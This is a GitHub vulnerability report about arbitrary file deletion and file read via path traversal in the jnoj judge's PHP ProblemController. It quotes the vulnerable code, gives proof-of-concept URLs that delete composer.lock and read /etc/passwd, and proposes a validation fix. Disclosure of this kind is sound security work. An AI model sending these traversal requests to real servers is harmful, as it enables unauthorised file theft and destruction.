
Arbitrary file deletion and arbitrary file read vulnerabilities #53

Closed
thiscodecc opened this issue Oct 10, 2019 · 1 comment

Comments


thiscodecc commented Oct 10, 2019

1. Arbitrary file deletion

Code: app\modules\polygon\controllers\ProblemController, lines 89 to 113

    public function actionDeletefile($id, $name)
    {
        $model = $this->findModel($id);
        if ($name == 'in') {
            $files = $model->getDataFiles();
            foreach ($files as $file) {
                if (strpos($file['name'], '.in')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
            }
        } else if ($name == 'out') {
            $files = $model->getDataFiles();
            foreach ($files as $file) {
                if (strpos($file['name'], '.out')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
                if (strpos($file['name'], '.ans')) {
                    @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $file['name']);
                }
            }
        } else {
            // $name comes straight from the request and is joined to the path unchecked
            @unlink(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
        }
        return $this->redirect(['test-data', 'id' => $model->id]);
    }

When unlink is called, the supplied file name is not validated, which allows arbitrary file deletion. Request URL:
http://127.0.0.1/jnoj/web/polygon/problem/deletefile?id=1&name=../../../../jnoj/composer.lock


2. Arbitrary file read

Code: app\modules\polygon\controllers\ProblemController, lines 115 to 121

    public function actionViewfile($id, $name)
    {
        $model = $this->findModel($id);
        echo '<pre>';
        // $name comes straight from the request and is joined to the path unchecked
        echo file_get_contents(Yii::$app->params['judgeProblemDataPath'] . $model->id . '/' . $name);
        echo '</pre>';
    }

Request URL:
http://127.0.0.1/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd


Suggested fix: validate the supplied file name.
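One way to implement the suggested validation, as an added example rather than code from the jnoj project: a helper that accepts only a bare test-data file name and then confirms the resolved path still lies inside the problem's data directory, so both the unlink() in actionDeletefile's final branch and the file_get_contents() in actionViewfile can be guarded by one check. The function name safeDataFilePath and the $baseDir parameter (standing in for Yii::$app->params['judgeProblemDataPath']) are assumptions.

```php
<?php
// Added example, not jnoj's own code. safeDataFilePath() and $baseDir
// (standing in for Yii::$app->params['judgeProblemDataPath']) are assumed names.
declare(strict_types=1);

function safeDataFilePath(string $baseDir, int $problemId, string $name): ?string
{
    // 1. Syntactic allow-list: a bare file name only, so no separators,
    //    no "..", no NUL bytes, no hidden files, and a known data extension.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(in|out|ans)\z/', $name)) {
        return null;
    }
    // 2. Semantic check: the resolved path must stay inside the problem
    //    directory even if the allow-list above is relaxed later.
    $dir = realpath($baseDir . DIRECTORY_SEPARATOR . $problemId);
    if ($dir === false) {
        return null;
    }
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name);
    if ($path === false || strpos($path, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a temporary data directory holding one problem file
// and one file outside the problem directory that must never be reachable.
$base = sys_get_temp_dir() . '/jnoj_demo_' . bin2hex(random_bytes(4));
mkdir($base . '/1', 0700, true);
file_put_contents($base . '/1/1.in', "sample input\n");
file_put_contents($base . '/secret.lock', "must stay unreachable\n");

// The traversal-style names are rejected before any file I/O happens.
foreach (['1.in', '../secret.lock', '../../../../etc/passwd', "1.in\0.txt"] as $name) {
    $p = safeDataFilePath($base, 1, $name);
    printf("%-26s => %s\n", addcslashes($name, "\0"), $p === null ? 'REJECTED' : 'ok: ' . $p);
}

// Clean up the constructed demo directory.
unlink($base . '/1/1.in');
unlink($base . '/secret.lock');
rmdir($base . '/1');
rmdir($base);
```

Only "1.in" is accepted; in actionDeletefile the literal "in" and "out" values are handled by the earlier branches and never reach the path join, so the helper applies to the final else branch and to actionViewfile.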

@shi-yang (Owner)

ok, thanks for the report

bobby285271 pushed a commit to scnu-socoding/scnuoj-2020 that referenced this issue Oct 4, 2020
bobby285271 pushed a commit to scnu-socoding/scnuoj-2020 that referenced this issue Jan 25, 2021
Former-commit-id: bfcd740fb538730c51952d02993b5439c1f0bae5